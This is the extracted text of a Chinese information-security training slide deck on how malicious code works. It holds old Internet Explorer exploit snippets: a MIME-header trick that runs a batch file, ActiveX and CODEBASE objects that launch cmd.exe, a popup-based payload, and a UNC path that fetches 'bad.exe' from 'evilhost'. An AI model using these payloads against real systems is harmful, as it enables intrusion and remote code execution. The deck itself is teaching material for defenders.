恶意代码原理介绍.pptVIP

信息安全技术恶意代码 中国信息安全产品测评认证中心（CNITSEC） CISP-2-恶意代码（培训样稿） Overview 什么是恶意代码 恶意代码如何会在你的系统上运行 防御恶意代码 什么是恶意代码 二进制文件 病毒、木马、逻辑炸弹 脚本 各种脚本语言嵌入文档的脚本 宏 什么是宏 Bimary File Format 恶意代码如何会被运行 伪装成有用的文件 嵌入其他文件 利用系统漏洞 欺骗 Overview 什么是恶意代码 方向 服务器?客户端、p2p 客户端?服务器 恶意代码如何会在你的系统上运行 防御恶意代码 伪装成有用的文件 Bind Exploit Php OF Exploit 邮件欺骗 Wantjob变种 “中国黑客” “You win ……free porn……” 嵌入其他文件 二进制可执行文件嵌入 病毒式的感染 insertcode.exe EXEbind 脚本嵌入 Word系列文件、lotus系列文件 HTML！！！ 利用系统漏洞 lotus Notes 邮件对象嵌入（略） Word 2000带有模板文件链接的RTF文件（略） 利用flash本身的漏洞 =6.0.29 畸形文件头缓冲区溢出 6.0.29 movie参数缓冲区溢出 IE的多个问题 OE、outlook、foxmail…… IE的多个问题 IE 5.5 以下异常处理MIME头 IE 5.5 以下com.ms.activeX.ActiveXComponent对象嵌入 IE 5.5 以下codebase指向 IE 6.0 window.PoPup()window.Open() 如何利用来运行指定的程序 IE 5.5 以下异常处理MIME头 nimda、wantjob、中国黑客、爱情森林 Content-Type: audio/x-wav; name=hello.bat Content-Transfer-Encoding: quoted-printable Content-ID: THE-CID cmd.exe com.ms.activeX.ActiveXComponent对象嵌入 APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent/APPLET SCRIPT ………… SCRIPT IE 5.5 以下codebase指向 CLSID不为0 CODEBASE指向绝对路径 OBJECT CLASSID = CLSID0-0-0-0 CODEBASE = \Winnt\system32\cmd.exe/OBJECT IE 6.0 window.PoPup()window.Open() IE 5.5 CODEBASE问题的延续 使用window.PoPup()或window.Open()调用创建一个新对象 var oPopup = window.createPopup(); function openPopupCMD() { var oPopBody = oPopup.document.body; oPopBody.innerHTML = OBJECT NAME=X CLASSID=CLSID0-0-0-0 CODEBASE=/winnt/system32/cmd.exe/OBJECT; oPopup.show( document.body); } setTimeout(openPopupCMD(),10); 如何利用来运行指定的程序 Codebase问题 预先上传的程序 UNC路径 CODEBASE = ‘\\evilhost\share\bad.exe’ com.ms.activeX.ActiveXComponent对象嵌入 预先上传的程序 UNC路径 D 利用HTML运行任意程序 预备知识 几个debug命令 几个对象 几个D命令 a 汇编命令，将汇编语句直接装配到存储器中 r 寄存器命令，显示和设置寄存器AX、BX、CX、DX等 n 命名命令 w 写命令，将指定数据写到磁盘上 q 退出 几个对象 WshNetwork 对象 提供对 Microsoft Windows 网络的访问，包括使用远程驱动器和打印机 WshShell 对象 启动进程，读写注册表…… 几个对象 FileSystemObject 对象 进行所有可能的文件操作，包括NTFS提供的一些特性。 Shell.Application 对象 浏览目录，运行程序。 利用HTML运行任意程序 调用ActiveX对象可以进行很多功能强大的操作，如运行程序等。但在执行较危险的调用时都会有警告信息。如将下面这行代码加到一个HTML文件中，